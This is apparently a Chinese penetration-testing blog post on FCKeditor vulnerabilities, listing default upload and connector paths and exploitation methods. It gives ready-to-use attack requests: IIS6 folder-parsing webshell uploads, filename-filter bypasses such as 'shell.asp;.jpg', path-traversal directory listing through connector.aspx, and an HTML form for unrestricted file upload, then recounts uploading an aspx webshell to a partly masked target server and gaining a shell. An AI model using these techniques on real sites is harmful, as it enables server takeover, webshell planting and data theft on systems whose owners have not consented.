FCKeditor编辑器漏洞

FCKeditor编辑器是一款强大的所见即所得文本编辑器,现在已经更名为:CKEditor

一、fckeditor的常见敏感目录(FCK有时要小写)

(1) 查看版本信息

  • 1 ---- /FCKeditor/editor/dialog/fck_about.html
  • 2 ---- /FCKeditor/_whatsnew.html

(2) 默认上传页面

  • FCKeditor编辑器默认会存在:test.htmluploadtest.html文件,直接访问这些文件可以获取当前文件夹文件名称 以及 上传文件。下面有五个常见的默认上传页面,在实战中可以进行尝试。

  • 1 ---- /FCKeditor/editor/filemanager/browser/default/browser.html ---- 在这个页面上传文件总是没有反应,并且无法新建目录

    貌似是只有管理员权限才能新建目录

  • 2 ---- /FCKeditor/editor/filemanager/browser/default/connectors/test.html

    上传成功之后访问:/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 可以看到xml格式的数据

  • 3 ---- /FCKeditor/editor/filemanager/upload/test.html

    上传之后提示:没有错误

    并且提示了上传的文件在:/UserFiles/apple.aspx中

  • 4 ---- /FCKeditor/editor/filemanager/connectors/test.html

  • 5 ---- /FCKeditor/editor/filemanager/connectors/uploadtest.html

(3) 连接器

  • /FCKeditor/editor/filemanager/connectors/aspx/connector.aspx
  • /FCKeditor/editor/filemanager/connectors/asp/connector.asp
  • /FCKeditor/editor/filemagager/connectors/php/connector.php

(4) 示例上传地址

  • 1 ---- /FCKeditor/_samples/default.html
  • 2 ---- /FCKeditor/editor/fckeditor.html
  • 3 ---- /FCKeditor/editor/fckdialog.html
    回显undefined,没有定义

二、常见利用方式

(1) windows 2003 + IIS6 文件解析路径漏洞
通过fckeditor在文件上传页面中,创建 xxx.asp 文件夹,在 xxx.asp 文件夹下上传一个名为 xxx.jpg 的图片后缀名webshell文件,即可获取到其shell

(2) 突破文件名限制

  • 1、重复上传同名文件,绕过:"." 变为 “-” 的限制
    • 某些版本的FCK上传shell.asp;.jpg 会变为 shell_asp;.jpg,继续上传 shell.asp;.jpg 就会变成:shell.asp;(1).jpg
  • 2、提交shell.php + 空格绕过文件名限制 ---- 只对windows系统有效

(3) 列目录

  • 示例上传地址:/FCKeditor/editor/fckeditor.html 不可以上传文件,可点击上传图片按钮,再选择浏览服务器即可跳转到可上传文件页,可查看已经上传的文件(前提是/FCKeditor/editor/fckeditor.html 页面存在)
  • 根据xml返回信息查看网站目录
http://***.1**.***.***:8081/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
  • 获取当前文件夹
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
  • 浏览E盘文件
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/

(4) 修改Media类型进行上传
FCKeditor 2.4.2 for php以下的版本在处理php上传的地方没有对Media类型进行上传文件类型的控制,导致用户可以上传任意文件,上传文件的表单如下所示(将其用浏览器打开即可),action为实际上传的地址

<form id="fileupload" enctype="multipart/form-data" action="http://xxx/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload file:<br />
<input type="file" name="newfile">
<input id="submit" type="submit" value="Upload">
</form>

三、实战

这里的目标服务器存在FCKeditor漏洞。FCKeditor的版本是:2.4.3


文件上传页面在:/fckeditor/editor/filemanager/upload/test.html

使用的语言是asp,这里上传一个aspx的大马文件

上传成功之后显示文件在/UserFiles/目录下,到该文件夹下可以找到该文件

点击之后输入用户名和密码即可连接,上传的是一个类似powershell的大马文件

getshell成功

这里还有另外一种getshell的方法,访问:/fckeditor/editor/fckeditor.html ---- 可以到示例上传地址页面,点击下面的上传图片按钮

在点击Link,浏览服务器可以到文件上传页面

文件上传页面

新建文件夹

在这里可以上传文件

更多推荐

【渗透测试】--- FCKeditor文本编辑器漏洞